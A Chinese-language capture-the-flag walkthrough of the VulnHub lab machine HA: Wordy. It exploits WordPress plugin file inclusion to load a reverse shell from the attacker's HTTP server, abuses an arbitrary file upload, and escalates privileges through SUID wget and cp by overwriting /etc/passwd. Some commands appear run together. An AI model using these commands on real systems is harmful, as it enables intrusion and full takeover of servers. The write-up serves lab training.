ha-wordy

admin 2025年4月7日12:02:11评论7 views字数 162阅读0分32秒阅读模式

下载地址:https://download.vulnhub.com/ha/ha-wordy.ova

攻击者IP:192.168.56.132 桥接(自动) vmare

受害者IP:192.168.56.153 仅主机 vxbox

参考:https://cloud.tencent.com/developer/article/2457831

https://mp.weixin.qq.com/s?__biz=MzIzNDE0Mzk0NA==&mid=2649593104&idx=1&sn=1e796bedb86fc52bcf66b0b6401cd346&chksm=f0e3dcb7c79455a176fe72493512eab58e181dca0fbeb67712f61048773a3c699afc518425f2&scene=21#wechat_redirect

端口扫描

ha-wordy

主页是apache默认页面

ha-wordy

目录扫描

ha-wordy

info.php显示了自己的地址

经典wp目录

ha-wordy

wpscan --url http://192.168.56.153/wordpress/ -e u 

发现用户

admin

aarti

ha-wordy

密码爆破失败

ha-wordy

看一下插件漏洞

wpscan --url http://192.168.56.153/wordpress/ -e u,ap 

ha-wordy

ha-wordy

可能存在漏洞的插件

mail-masta

reflex-gallery

site-editor

slideshow-gallery

wp-easycart-data

wp-support-plus-responsive-ticket-system

wp-symposium

wp插件漏洞1

mail masta版本1.0

ha-wordy

ha-wordy

ha-wordy

脚本会检查目标是否可用,并判断 Mail Masta 端点是否存在漏洞。如果一切正常,脚本将会开始 fuzzing 以查找系统中的文件。

并不能反弹shell

ha-wordy

根据代码内容发现存在本地文件包含

ha-wordy

验证漏洞

http://192.168.56.153/wordpress//wp-content/plugins/mail-masta/inc/campaign/count_of_send.php?pl=/etc/passwd

ha-wordy

存在远程文件包含

ha-wordy

包含一下shell文件

直接访问apache的php文件不会解析

ha-wordy

用python开启一下临时的http服务

python -m http.server 8080

然后访问

http://192.168.56.153/wordpress/wp-content/plugins/mail-masta/inc/campaign/count_of_send.php?pl=http://192.168.56.132:8080/shell5.0.php

ha-wordy

反弹shell

ha-wordy

wp插件漏洞2

searchsploit reflex 

3.13的任意文件上传

ha-wordy

ha-wordy

cat /usr/share/exploitdb/exploits/php/webapps/36374.txt

查看poc

ha-wordy

开启apache服务后将文件放在/var/www/html中,修改ip为受害者ip

ha-wordy

上传shell5.0.php

ha-wordy

ha-wordy

浏览器访问,反弹shell

http://192.168.56.153/wordpress/wp-content/uploads/2024/10/shell5.0.php

ha-wordy

http://192.168.56.153/secret.zip

在/var/www/html发现一个上锁的zip

ha-wordy

爆破失败

ha-wordy

home存在用户raj

查看config文件发现密码123

ha-wordy

切换raj用户,发现切换失败

ha-wordy

使用suid提权

find / -user root -perm -4000 -print 2>/dev/null

发现wget和cp

ha-wordy

SUID提权

wget提权

ha-wordy

TF=$(mktemp)chmod +x $TFecho -e '#!/bin/sh -pn/bin/sh -p 1>&0' >$TF/usr/bin/wget --use-askpass=$TF 0

ha-wordy

cp提权

cd /var/www/htmlcat /etc/passwd > passwdopenssl passwd -1 -salt admin admin$1$admin$1kgWpnZpUx.vTroWPXPIB0

ha-wordy

wget 192.168.56.132/passwd

cp /tmp/passwd /etc/passwd

admin/admin

ha-wordy

原文始发于微信公众号(王之暴龙战神):ha-wordy

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2025年4月7日12:02:11
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   ha-wordyhttps://cn-sec.com/archives/3922085.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息